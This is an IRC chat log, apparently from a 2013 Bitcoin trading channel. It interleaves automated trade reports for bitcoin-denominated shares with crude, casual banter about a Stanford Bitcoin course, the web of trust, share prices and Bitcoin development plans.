Jul 05 22:48:41 are you talking about the word "bitcoin" ? Jul 05 22:48:47 instead of integrating Paypal or some such to the project, it will be Bitcoin. Jul 05 22:48:59 No, about functionally being able to process Bitcoin transactions Jul 05 22:49:00 these two aren't interchangeable. Jul 05 22:49:07 you don't link linux instead of whatever windows .dll Jul 05 22:49:15 into your broken .net codebase Jul 05 22:49:36 That's not what I... Jul 05 22:49:45 i know i know! i'm just having my period ok ? Jul 05 22:49:57 I didn't imply Paypal or Bitcoin were similar at all. Jul 05 22:50:09 lol Jul 05 22:50:52 maybe buttcoin has something to cheer you up Jul 05 22:51:09 nope Jul 05 22:51:19 I'm just saying the project must integrate a payment method. And they chose to make students integrate Bitcoin instead of something more, erhm... "traditional". It's akin of saying they'd run on Linux instead of saying Windows. Jul 05 22:51:22 actually i just read some us bonds data and i'm lolled the fuck out. Jul 05 22:51:53 Not about comparing/mixing the two togethers Jul 05 22:52:06 how many bonds should i buy? Jul 05 22:52:20 Let's see... you should short a few billions. Jul 05 22:52:26 about as many as stanford bitcoin start-ups, give or take. Jul 05 22:53:05 who knew that being lazy about meeting with the financial advisor would pay off Jul 05 22:53:13 heh Jul 05 22:53:50 also in the news, i'm actually playing minigame rpg. Jul 05 22:53:57 It's a course project... it's not meant to be deployed outside the class, it's meant to be functional. Learn how to build stuff. Jul 05 22:54:08 well... Jul 05 22:54:17 we all know it won't stop there Jul 05 22:55:30 I don't see why all the criticism, that's all. Oh. So you expect we'll see a fucking thousand Bitcoin crowdfunding website clones being mass produced at Standford? That would be awful... Jul 05 22:56:02 i dont care either way personally Jul 05 22:56:15 just thought the link was worth sharing Jul 05 22:56:46 Namworld no. what i think is that some people who have no clue about bitcoin pretend to teach others about bitcoin. Jul 05 22:57:05 this is bad, because the net result is even more idiots who have to first be beaten into a pulp, either by mpoe-pr or the market Jul 05 22:57:23 [MPEX] [S.DICE] 1000 @ 0.0020451 = 2.0451 BTC [-] Jul 05 22:57:24 before they unlearn the stupidities and insanities they learned and can become productive members of the community. Jul 05 22:57:52 so basically stanford is fucking up a number of kids who otherwise had a chance, maybe. Jul 05 22:58:13 [HAVELOCK] [ASICM] 457 @ 0.039479 = 18.0419 BTC [+] Jul 05 22:58:15 Yeah. I don't think too much of it. But I find it fun professors have decided to make their student integrate Bitcoin as the payment system instead of something like Paypal. Jul 05 22:58:17 [HAVELOCK] [ASICM] 143 @ 0.039479 = 5.6455 BTC [+] Jul 05 22:58:31 well if it were 2012 and we'd be unknown i could see it. Jul 05 22:58:39 but as it is, bitcoin is moar than stanford, so. Jul 05 22:58:49 they're leeching us not the other way around. Jul 05 22:58:58 so for the sake of the argument, if the student is an engineering major, and will be the guy building such services regardless, Jul 05 22:59:13 should he now be reqquired to have a bitcoin Economics class? Jul 05 22:59:51 nope. Jul 05 23:00:16 how does one become qualified then,to build a bitcoin service Jul 05 23:00:18 but in order for the teacher to claim he's teaching anything whatsoever to do with bitcoin, he is legally required to first make a wot account and come here and say the fuck so. Jul 05 23:00:30 hmm Jul 05 23:00:33 well ? Jul 05 23:00:35 can you go teach law ? Jul 05 23:00:40 nope Jul 05 23:00:43 well then. Jul 05 23:00:48 tjhey can't teach bitcoin. it's the law. Jul 05 23:00:57 [BTCTC] [ESECURITYSABTC] 2 @ 0.32 = 0.64 BTC [+] Jul 05 23:01:13 I don't think it matters. It's not like Bitcoin is hard to understand. The professors aren't bitcointalk.org morons either. Jul 05 23:01:23 it is hard to understand is the problem. Jul 05 23:01:28 wot doesn't matter at all Jul 05 23:01:35 here we go... Jul 05 23:01:39 this is why otherwise respectable gentlemen come here to ask how to trace fraudsters via bitcoin addresses Jul 05 23:01:45 it's motherfuckingly hard to understand. Jul 05 23:02:06 because it contradicts a host of mistaken notions people built for their own convenience, but unfortunately with no reality backing them at all. Jul 05 23:02:36 Yes, for most... who are clueless as to how Bitcoin works... Jul 05 23:02:43 i do find that each person i try to explain bitcoin to, hears something different than the last Jul 05 23:02:59 ThickAsThieves the result of them listening to themselves more than you. Jul 05 23:03:00 each clings to some aspect of it Jul 05 23:03:00 But anyone with half a brain who takes the time to inform himself can see how Bitcoin payments work. Jul 05 23:03:15 Namworld no argument. the requirement to wot is there to force people to actually consider shit Jul 05 23:03:28 rather than jsut go "o well i'm a stanford lecturer, i'm so clever and know shit" Jul 05 23:03:36 you don't know what you don't put the effort in to learn. Jul 05 23:04:43 There's no need for a WoT account beside. I doutb the WoT will retain much importance at all other than for person to person transactions. Jul 05 23:05:09 if WoT doesnt survive something similar will displac eit Jul 05 23:05:13 I don't think lecturers are there to teach anything Bitcoin related... just startups related. Jul 05 23:05:17 you can doubt anything you want. it'll stay the standard long after most governments gave up on the pretense of having a "ministry of finance" Jul 05 23:05:55 i do like the forum Trust thing, but it has that whole flaw of being tied to the forum Jul 05 23:06:09 yeah. website logins are meh. Jul 05 23:06:25 meanwhile back at the ranch, http://www.google.com/search?q=Niccolo+Caldararo&complete=0&tbs=qdr:d Jul 05 23:06:25 no gpg, no 2fa Jul 05 23:06:26 Quite... and the forum is an insanity hole. Jul 05 23:06:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.039489 BTC [-] Jul 05 23:06:36 why the hell doesnt the forum have 2fa Jul 05 23:06:36 Fun place tho. Jul 05 23:06:41 guy spends a lifetime wearing a berret, writing for half the liberal web... Jul 05 23:06:51 all it takes is one mention on my blog and that's the top result. Jul 05 23:08:28 [HAVELOCK] [ASICM] 25 @ 0.039 = 0.975 BTC [-] Jul 05 23:08:51 [HAVELOCK] [ASICM] 5 @ 0.039 = 0.195 BTC [-] Jul 05 23:10:12 [HAVELOCK] [ASICM] 35 @ 0.039 = 1.365 BTC [-] Jul 05 23:10:14 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Jul 05 23:10:36 time for the bounce! Jul 05 23:11:13 It's a bear-trap, sell, sell sell! Jul 05 23:11:40 What are we talking aboubt again? Jul 05 23:12:04 I see asks building up. I was almost scared for a while with the low orderbook volumes. Jul 05 23:12:39 both fiat and AM will bounce soon i bet Jul 05 23:12:40 [BTCTC] [TAT.ASICMINER] 14 @ 0.039489 = 0.5528 BTC [-] Jul 05 23:12:45 Meanwhile, tytus of 100th fame crashes the market again, by placing a large ASK order at 80% of market trade. Jul 05 23:13:07 fame? Jul 05 23:13:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 23:13:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.039494 BTC [+] Jul 05 23:13:42 He's the friedcat of 100th. Jul 05 23:13:51 100th? Jul 05 23:14:02 It's the AM of Bitfury :-) Jul 05 23:14:06 :-P Jul 05 23:14:27 it's the must-discover-the-next-AM flavor of last month Jul 05 23:15:11 Indeed. Jul 05 23:15:21 I think this week's flavor is Ciphermine. Jul 05 23:15:35 [HAVELOCK] [ASICM] 1 @ 0.0392 BTC [+] Jul 05 23:15:36 [HAVELOCK] [ASICM] 1 @ 0.0393 BTC [+] Jul 05 23:15:38 [HAVELOCK] [ASICM] 1 @ 0.0394 BTC [+] Jul 05 23:15:39 [HAVELOCK] [ASICM] 1 @ 0.03946 BTC [+] Jul 05 23:15:40 [HAVELOCK] [ASICM] 296 @ 0.03946799 = 11.6825 BTC [+] Jul 05 23:15:48 [HAVELOCK] [ASICM] 165 @ 0.03946799 = 6.5122 BTC [+] Jul 05 23:16:21 [BTCTC] [DMS.SELLING] 5 @ 0.0291 = 0.1455 BTC [-] Jul 05 23:16:23 I'd let you know my pick for next week, but that would just be giving money away... Jul 05 23:16:31 [HAVELOCK] [ASICM] 1 @ 0.03946 BTC [-] Jul 05 23:16:32 [HAVELOCK] [ASICM] 105 @ 0.03946799 = 4.1441 BTC [+] Jul 05 23:16:33 [HAVELOCK] [ASICM] 1 @ 0.03946899 BTC [+] Jul 05 23:16:34 [HAVELOCK] [ASICM] 122 @ 0.039477 = 4.8162 BTC [+] Jul 05 23:16:41 [HAVELOCK] [ASICM] 2 @ 0.039477 = 0.079 BTC [+] Jul 05 23:16:42 [HAVELOCK] [ASICM] 5 @ 0.0395 = 0.1975 BTC [+] Jul 05 23:16:55 i already know next week's Jul 05 23:16:57 [HAVELOCK] [ASICM] 1 @ 0.03947 BTC [-] Jul 05 23:17:12 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [+] Jul 05 23:17:14 [HAVELOCK] [ASICM] 2 @ 0.0404 = 0.0808 BTC [+] Jul 05 23:17:15 [HAVELOCK] [ASICM] 1 @ 0.0408 BTC [+] Jul 05 23:17:16 [HAVELOCK] [ASICM] 1 @ 0.041 BTC [+] Jul 05 23:17:17 [HAVELOCK] [ASICM] 2 @ 0.0415 = 0.083 BTC [+] Jul 05 23:17:18 tell me :) Jul 05 23:17:18 [HAVELOCK] [ASICM] 4 @ 0.0418 = 0.1672 BTC [+] Jul 05 23:17:19 [HAVELOCK] [ASICM] 4 @ 0.042 = 0.168 BTC [+] Jul 05 23:17:20 [HAVELOCK] [ASICM] 2 @ 0.0422 = 0.0844 BTC [+] Jul 05 23:17:37 [BTCTC] [DMS.PURCHASE] 8 @ 0.049181 = 0.3934 BTC [-] Jul 05 23:17:41 Flavor of the week? Jul 05 23:18:12 To me the flavors are fiat, S.DICE, BitPride, BitVPS, Coinroll Jul 05 23:18:26 Same for next weeks Jul 05 23:18:35 those seem kinda vanilla to me... Jul 05 23:18:56 i'm talking like Cayenne Dark Chocolate Chip Jul 05 23:19:06 spicy! Jul 05 23:19:52 Yeah, but I'm not looking to burn a hole in my pocket for money to escape. Jul 05 23:20:01 I'll avoid hot flavors Jul 05 23:20:30 :) Jul 05 23:20:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.039501 BTC [+] Jul 05 23:20:48 and gorge myself with fattening stuff. Jul 05 23:21:11 ThickAsThieves some guy, came out of nowhere claiming he has an exchange and assets on it a few months back. the girl told him off. Jul 05 23:21:12 like penis? Jul 05 23:21:16 inexplicably he's still pretending. Jul 05 23:21:33 what exchange? Jul 05 23:21:37 picostocks Jul 05 23:21:40 ah Jul 05 23:21:42 mircea_popescu, fluffygurl ? Jul 05 23:21:43 -.- Jul 05 23:21:49 Apocalyptic mpoe-pr Jul 05 23:21:53 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Jul 05 23:22:06 that's basically her other nick i heard Jul 05 23:22:09 if even *I* won't open a PT there, you know there's a problem Jul 05 23:22:11 ;) Jul 05 23:22:51 [HAVELOCK] [ASICM] 14 @ 0.040002 = 0.56 BTC [-] Jul 05 23:24:09 So _that's_ what Shutdown means. Jul 05 23:24:18 lol messy tat. Jul 05 23:24:18 meow Jul 05 23:24:55 I just joined the neighborhood and this fat cat already has fat pussies. Jul 05 23:26:11 It was short lived. The FatCat in town doesn't like his title to be usurped (aka nick is registered) Jul 05 23:26:12 you joined the neighbourhood ?! Jul 05 23:27:19 The rich neighborhood... as in became a fat cat and started to mix with the "elite" Jul 05 23:27:23 i sthat some kind of cult? Jul 05 23:27:59 Yes, a cult of the self I believe. Jul 05 23:28:08 From what I've seen. Jul 05 23:28:18 http://www.christies.com/lotfinder/paintings/ludovic-rodo-pissarro-cinq-sacs-a-la-mains-5530223-details.aspx Jul 05 23:28:24 this thing ios called "five handbags" Jul 05 23:28:32 [HAVELOCK] [ASICM] 1 @ 0.0411 BTC [+] Jul 05 23:28:43 [HAVELOCK] [ASICM] 19 @ 0.0436 = 0.8284 BTC [+] Jul 05 23:29:01 [HAVELOCK] [ASICM] 60 @ 0.043799 = 2.6279 BTC [+] Jul 05 23:29:43 [HAVELOCK] [SDICE] 5 @ 0.19499799 = 0.975 BTC [+] Jul 05 23:32:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [+] Jul 05 23:33:18 [HAVELOCK] [ASICM] 1 @ 0.043 BTC [-] Jul 05 23:34:16 it'd be better if it was a painting of a cow Jul 05 23:34:31 or is that the joke ;) Jul 05 23:35:11 lol Jul 05 23:35:23 https://lh4.googleusercontent.com/-ikj3v4t9cEo/UdctwEj6vgI/AAAAAAAAOAE/PEZCVRdqlKM/w506-h380-o/IMG_20130705_135507_048.jpg Jul 05 23:35:31 seriously, 5k ? i'd rather buy whores underwear. Jul 05 23:35:34 your asicminer dividends are safe because morons like me buy theri shit Jul 05 23:35:49 jcpham it does look kinda cool. Jul 05 23:35:53 ikr Jul 05 23:35:58 60 waats is sexy Jul 05 23:36:02 *watts Jul 05 23:36:05 why 11 tho ?! Jul 05 23:36:12 i actually have more Jul 05 23:36:17 it's justthe one strip Jul 05 23:36:33 sitting at my desk playing Jul 05 23:37:07 [HAVELOCK] [ASICM] 33 @ 0.042499 = 1.4025 BTC [-] Jul 05 23:39:24 [BTCTC] [TAT.ASICMINER] 73 @ 0.041 = 2.993 BTC [+] Jul 05 23:40:51 ;;ticker Jul 05 23:40:51 MtGox BTCUSD ticker | Best bid: 69.95000, Best ask: 69.95633, Bid-ask spread: 0.00633, Last trade: 69.95000, 24 hour volume: 75311.42962310, 24 hour low: 65.42448, 24 hour high: 81.70000, 24 hour vwap: 71.63100 Jul 05 23:41:10 how high will it bounce? Jul 05 23:41:33 back to 80 maybe Jul 05 23:41:53 [BTCTC] [ASICMINER-PT] 1 @ 4.002 BTC [-] Jul 05 23:41:54 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Jul 05 23:42:38 lol the two guys wanting to flip houses using bitcoin are fighting: https://bitcointalk.org/index.php?topic=250161.msg2663672#msg2663672 Jul 05 23:42:51 Branny is the guy that runs RentalStarter Jul 05 23:42:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.041 = 0.164 BTC [+] Jul 05 23:43:15 whom just signed a contract today, but has yet to convert his btc to fiat Jul 05 23:44:51 [BTCTC] [ASICMINER-PT] 2 @ 4.12 = 8.24 BTC [+] Jul 05 23:44:53 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [+] Jul 05 23:46:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0415 BTC [+] Jul 05 23:46:55 [HAVELOCK] [SDICE] 1 @ 0.19499899 BTC [+] Jul 05 23:47:28 meanwhile in btc-anal: Jul 05 23:47:34 [16:43] This be a confusing question, but how can i analyse or otherwise find out if bitcoin prices at places like mtgox will be dropping in the next 6, 12, and/or 24 hours ? Jul 05 23:47:34 [16:45] here's how Jul 05 23:47:34 [16:45] :) Jul 05 23:47:34 [16:45] ;;8ball will btc be dropping in the next 6, 12, and/or 24 hours ? Jul 05 23:47:34 [16:45] <@gribble> Yes! Jul 05 23:47:34 [16:46] bam! Jul 05 23:47:34 [16:46] are you serious? gribble? Jul 05 23:47:35 [16:46] gribbly is correct more often than most people in this room Jul 05 23:47:35 [16:46] soo, yes, gribble Jul 05 23:47:36 [16:47] no... is that like that magic 8ball game? That can't be a serious tool Jul 05 23:48:00 this guy... Jul 05 23:48:04 [HAVELOCK] [SDICE] 1 @ 0.195 BTC [+] Jul 05 23:48:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.0415 = 0.083 BTC [+] Jul 05 23:49:14 [BTCTC] [RSM] 3 @ 0.016005 = 0.048 BTC [+] Jul 05 23:49:16 [HAVELOCK] [SDICE] 1 @ 0.1954 BTC [+] Jul 05 23:49:20 [HAVELOCK] [ASICM] 13 @ 0.043499 = 0.5655 BTC [+] Jul 05 23:51:37 lol TaT, are you turning troll? =P Jul 05 23:52:36 [HAVELOCK] [ASICM] 4 @ 0.043399 = 0.1736 BTC [-] Jul 05 23:53:25 The bitcoin community owes thanks to the Core Development Team that is dedicating significant time to improving usability for the entire bitcoin system. Jul 05 23:53:40 http://thegenesisblock.com/significant-merchant-improvements-planned-for-bitcoin-v0-9/ Jul 05 23:53:45 Significant Merchant Improvements Planned for Bitcoin v0.9 - The Genesis Block Jul 05 23:53:59 what do i owe? Jul 05 23:54:15 thanks, i see Jul 05 23:55:17 You owe them 5 thanks and 25 gratitudes Jul 05 23:55:18 [HAVELOCK] [ASICM] 144 @ 0.042001 = 6.0481 BTC [-] Jul 05 23:55:19 [HAVELOCK] [ASICM] 1 @ 0.042 BTC [-] Jul 05 23:55:19 [HAVELOCK] [ASICM] 1109 @ 0.041751 = 46.3019 BTC [-] Jul 05 23:55:20 [HAVELOCK] [ASICM] 225 @ 0.04011001 = 9.0248 BTC [-] Jul 05 23:55:21 [HAVELOCK] [ASICM] 75 @ 0.04011 = 3.0083 BTC [-] Jul 05 23:55:22 [HAVELOCK] [ASICM] 209 @ 0.04 = 8.36 BTC [-] Jul 05 23:55:24 [HAVELOCK] [ASICM] 330 @ 0.04 = 13.2 BTC [-] Jul 05 23:55:59 hrm Jul 05 23:56:04 Also noted as ☺5.25 Jul 05 23:56:24 [BTCTC] [ASICMINER-PT] 2 @ 4.12 = 8.24 BTC [+] Jul 05 23:56:25 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [+] Jul 05 23:56:51 I got an idea for a bet: Sentence "Bitcoin development continues with irresistible force toward version 1.0" will appear in significant news source. Jul 05 23:57:29 ofc bitbet won't approve it, but i'm certain some dude will come up with it (if it did not already) Jul 05 23:57:40 you just did Jul 05 23:57:43 [HAVELOCK] [ASICM] 1 @ 0.039999 BTC [-] Jul 05 23:58:07 yea, i'll copyright troll them then Jul 05 23:58:23 [HAVELOCK] [ASICM] 45 @ 0.039502 = 1.7776 BTC [-] Jul 05 23:58:25 [HAVELOCK] [ASICM] 131 @ 0.039501 = 5.1746 BTC [-] Jul 05 23:58:26 [HAVELOCK] [ASICM] 1 @ 0.0395 BTC [-] Jul 05 23:58:26 [HAVELOCK] [ASICM] 60 @ 0.0393 = 2.358 BTC [-] Jul 05 23:58:28 [HAVELOCK] [ASICM] 260 @ 0.0392 = 10.192 BTC [-] Jul 05 23:58:29 [HAVELOCK] [ASICM] 126 @ 0.03901 = 4.9153 BTC [-] Jul 05 23:58:30 [HAVELOCK] [ASICM] 35 @ 0.039 = 1.365 BTC [-] Jul 05 23:58:31 [HAVELOCK] [ASICM] 100 @ 0.03890001 = 3.89 BTC [-] Jul 05 23:58:32 [HAVELOCK] [ASICM] 1 @ 0.0389 BTC [-] Jul 05 23:58:33 [HAVELOCK] [ASICM] 180 @ 0.03848 = 6.9264 BTC [-] Jul 05 23:58:34 [HAVELOCK] [ASICM] 2 @ 0.0384 = 0.0768 BTC [-] Jul 05 23:58:35 [HAVELOCK] [ASICM] 1 @ 0.038 BTC [-] Jul 05 23:59:22 [BTCTC] [ASICMINER-PT] 2 @ 4.13 = 8.26 BTC [+] Jul 05 23:59:23 [BTCTC] [ASICMINER-PT] 2 @ 4.14 = 8.28 BTC [+] Jul 06 00:01:23 [HAVELOCK] [ASICM] 5 @ 0.040399 = 0.202 BTC [+] Jul 06 00:03:50 [BTCTC] [TAT.ASICMINER] 286 @ 0.0415 = 11.869 BTC [+] Jul 06 00:04:35 [HAVELOCK] [ASICM] 50 @ 0.039499 = 1.975 BTC [-] Jul 06 00:04:44 [HAVELOCK] [ASICM] 4 @ 0.039498 = 0.158 BTC [-] Jul 06 00:04:50 [HAVELOCK] [ASICM] 1 @ 0.039498 BTC [-] Jul 06 00:04:51 [HAVELOCK] [ASICM] 2 @ 0.039498 = 0.079 BTC [-] Jul 06 00:06:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.042335 BTC [+] Jul 06 00:07:13 [HAVELOCK] [ASICM] 1 @ 0.03935 BTC [-] Jul 06 00:11:36 [HAVELOCK] [ASICM] 2 @ 0.03855 = 0.0771 BTC [-] Jul 06 00:11:37 [HAVELOCK] [ASICM] 10 @ 0.0384 = 0.384 BTC [-] Jul 06 00:11:39 [HAVELOCK] [ASICM] 4 @ 0.03820001 = 0.1528 BTC [-] Jul 06 00:11:40 [HAVELOCK] [ASICM] 10 @ 0.0382 = 0.382 BTC [-] Jul 06 00:11:40 [HAVELOCK] [ASICM] 1 @ 0.038001 BTC [-] Jul 06 00:11:41 [HAVELOCK] [ASICM] 1 @ 0.0376 BTC [-] Jul 06 00:11:42 [HAVELOCK] [ASICM] 1 @ 0.0371 BTC [-] Jul 06 00:11:43 [HAVELOCK] [ASICM] 1 @ 0.037 BTC [-] Jul 06 00:11:44 I just need a tiny dip again today and I'll be set Jul 06 00:11:45 [HAVELOCK] [ASICM] 1 @ 0.0366 BTC [-] Jul 06 00:11:46 [HAVELOCK] [ASICM] 99 @ 0.0365 = 3.6135 BTC [-] Jul 06 00:12:13 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004451 = 0.0089 BTC [-] Jul 06 00:12:15 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00445 = 0.0223 BTC [-] Jul 06 00:12:16 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.00438 = 0.0307 BTC [-] Jul 06 00:12:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004369 BTC [-] Jul 06 00:12:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00435 = 0.0087 BTC [-] Jul 06 00:12:19 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00415 = 0.0623 BTC [-] Jul 06 00:12:21 [BTCTC] [TAT.VIRTUALMINE] 1500 @ 0.0041 = 6.15 BTC [-] Jul 06 00:12:22 [BTCTC] [TAT.VIRTUALMINE] 3866 @ 0.004 = 15.464 BTC [-] Jul 06 00:14:01 [HAVELOCK] [ASICM] 1 @ 0.0386 BTC [+] Jul 06 00:15:53 [HAVELOCK] [ASICM] 1 @ 0.0388 BTC [+] Jul 06 00:15:54 [HAVELOCK] [ASICM] 1 @ 0.039228 BTC [+] Jul 06 00:15:55 [HAVELOCK] [ASICM] 1059 @ 0.039249 = 41.5647 BTC [+] Jul 06 00:15:57 [HAVELOCK] [ASICM] 1 @ 0.0393 BTC [+] Jul 06 00:16:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.0406 = 0.1218 BTC [-] Jul 06 00:16:26 [HAVELOCK] [ASICM] 1 @ 0.03935 BTC [+] Jul 06 00:16:27 [HAVELOCK] [ASICM] 1 @ 0.0394 BTC [+] Jul 06 00:19:17 [HAVELOCK] [VTX] 10 @ 0.805 = 8.05 BTC [-] Jul 06 00:19:19 [HAVELOCK] [VTX] 6 @ 0.809 = 4.854 BTC [+] Jul 06 00:19:20 [HAVELOCK] [VTX] 2 @ 0.84 = 1.68 BTC [+] Jul 06 00:19:21 [HAVELOCK] [VTX] 28 @ 0.85 = 23.8 BTC [+] Jul 06 00:19:22 [HAVELOCK] [VTX] 22 @ 0.99 = 21.78 BTC [+] Jul 06 00:19:55 [HAVELOCK] [VTX] 32 @ 0.998 = 31.936 BTC [+] Jul 06 00:20:34 [HAVELOCK] [VTX] 11 @ 0.998 = 10.978 BTC [+] Jul 06 00:20:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.040501 = 0.6075 BTC [-] Jul 06 00:21:27 [BTCTC] [ASICMINER-PT] 2 @ 4.249 = 8.498 BTC [+] Jul 06 00:21:29 a little bit more Jul 06 00:24:12 jurov let's just hope they don't hardfork it again. Jul 06 00:24:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0406 = 0.203 BTC [+] Jul 06 00:25:21 [BTCTC] [S.DICE-PT] 34 @ 0.002498 = 0.0849 BTC [+] Jul 06 00:25:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.0406 = 0.609 BTC [+] Jul 06 00:26:53 [BTCTC] [S.DICE-PT] 16 @ 0.002499 = 0.04 BTC [+] Jul 06 00:27:58 dunno, well done hardfork can considerably "improve usability for the entire bitcoin system" Jul 06 00:29:52 [BTCTC] [MININGCO.ETF] 1 @ 1.1 BTC [+] Jul 06 00:30:34 [BTCTC] [MININGCO.ETF] 1 @ 1.35 BTC [+] Jul 06 00:30:44 totally. Jul 06 00:31:05 "i was improving the usability for the whole system but then i took a fork to the eye" Jul 06 00:31:34 [BTCTC] [MININGCO.ETF] 1 @ 1.4 BTC [+] Jul 06 00:33:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.040501 BTC [-] Jul 06 00:33:43 mircea_popescu: orkjakdjadkjalwke Jul 06 00:34:03 wut ? Jul 06 00:34:04 Diablo-D3: that sounds like a special version of Ubuntu that you've fallen in love with. Jul 06 00:35:16 [BTCTC] [TAT.ASICMINER] 42 @ 0.0406 = 1.7052 BTC [+] Jul 06 00:35:35 [BTCTC] [ASICMINER-PT] 1 @ 4.249 BTC [+] Jul 06 00:35:43 that's his new programming language Jul 06 00:35:46 D3++ Jul 06 00:36:15 [BTCTC] [GSDPT] 10 @ 0.002199 = 0.022 BTC [-] Jul 06 00:36:20 [BTCTC] [MININGCO.ETF] 1 @ 1.100001 BTC [-] Jul 06 00:36:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.042335 = 0.127 BTC [+] Jul 06 00:36:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.042335 = 0.1693 BTC [+] Jul 06 00:36:49 [BTCTC] [COGNITIVE] 1 @ 0.339997 BTC [+] Jul 06 00:37:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.042336 = 0.0847 BTC [+] Jul 06 00:37:47 does it improve usability for the entire system? Jul 06 00:39:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Jul 06 00:39:44 [BTCTC] [S.DICE-PT] 200 @ 0.002499 = 0.4998 BTC [+] Jul 06 00:39:44 doesnt everything? Jul 06 00:39:48 Azelphur: yeah, its the finnish version of ubuntu Jul 06 00:39:56 :D Jul 06 00:40:50 [HAVELOCK] [SDICE] 3 @ 0.176101 = 0.5283 BTC [-] Jul 06 00:41:01 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Jul 06 00:41:03 [BTCTC] [COGNITIVE] 1 @ 0.347887 BTC [+] Jul 06 00:41:09 [HAVELOCK] [SDICE] 1 @ 0.1761 BTC [-] Jul 06 00:45:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.040849 BTC [-] Jul 06 00:46:40 [BTCTC] [S.DICE-PT] 2 @ 0.002366 = 0.0047 BTC [-] Jul 06 00:46:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.042336 = 0.2117 BTC [+] Jul 06 00:51:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.04095 BTC [-] Jul 06 00:51:39 [BTCTC] [DMS.PURCHASE] 1 @ 0.049 BTC [-] Jul 06 00:51:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.040945 BTC [-] Jul 06 00:52:25 http://sketch-out.appspot.com/ Jul 06 00:52:27 Sketchout Jul 06 00:52:29 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Jul 06 00:52:29 this shit's pretty good Jul 06 00:53:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.04095 BTC [+] Jul 06 00:54:13 [BTCTC] [TAT.ASICMINER] 15 @ 0.042335 = 0.635 BTC [+] Jul 06 00:54:15 [BTCTC] [TAT.ASICMINER] 16 @ 0.042336 = 0.6774 BTC [+] Jul 06 00:57:37 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [-] Jul 06 00:57:39 [BTCTC] [ASICMINER-PT] 1 @ 4.10005 BTC [-] Jul 06 00:57:41 [BTCTC] [ASICMINER-PT] 3 @ 4.1 = 12.3 BTC [-] Jul 06 00:57:43 [BTCTC] [ASICMINER-PT] 2 @ 4.01 = 8.02 BTC [-] Jul 06 00:58:53 [HAVELOCK] [ASICM] 150 @ 0.04024 = 6.036 BTC [+] Jul 06 00:59:08 [HAVELOCK] [ASICM] 1 @ 0.04025 BTC [+] Jul 06 00:59:10 [HAVELOCK] [ASICM] 5 @ 0.041 = 0.205 BTC [+] Jul 06 00:59:11 [HAVELOCK] [ASICM] 1 @ 0.041 BTC [+] Jul 06 00:59:36 mircea_popescu: I just had a dream you were playing WoW Jul 06 00:59:47 and the entire #bitcoin-assets channel had a guild Jul 06 01:01:04 that's all we need, more situations for mp to yell at us Jul 06 01:01:12 lmao Jul 06 01:01:22 were we like all fat an' raidin' ? Jul 06 01:01:30 That is the 3rd dream reported about you mp Jul 06 01:01:44 no it was during a snow storm in july...in georgia Jul 06 01:01:46 jborkl and all boys! Jul 06 01:01:49 so I knew something was fishy Jul 06 01:01:50 I don't remember who has the other 3 Jul 06 01:01:52 and you were playing WoW Jul 06 01:01:56 so that's also fishy Jul 06 01:02:07 LOL uh yeah :( Jul 06 01:02:08 but you were answering serious questions on irc while playing WoW at the same time Jul 06 01:02:21 well it is kind of what im doing. Jul 06 01:02:26 I was like "WTF How does mircea_popescu type so fast?!?!?!?!?" Jul 06 01:03:06 You are going to have to take your unbuttoned shirt pic off twitter, no more dreams Jul 06 01:03:21 I didn't actually see him! Jul 06 01:03:25 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [-] Jul 06 01:03:27 it was just his screen name Jul 06 01:03:40 kakobrekla was there too Jul 06 01:03:46 or replace it with a pic in which i'm drilling some chick or something Jul 06 01:04:09 yeah, that way these guys on here don't get the srong idea Jul 06 01:04:14 wrong Jul 06 01:04:22 mircea_popescu: only if that chick is a famous actress Jul 06 01:04:42 she would be famous then, mp has a bunch of twitter followers Jul 06 01:04:51 >twitter followers Jul 06 01:04:53 >famous Jul 06 01:05:00 lol Jul 06 01:05:05 lol Jul 06 01:05:25 Not sure I like these new changes in v0.9 Jul 06 01:05:32 "i'm twitter famous" "meaning ?" "not famous" Jul 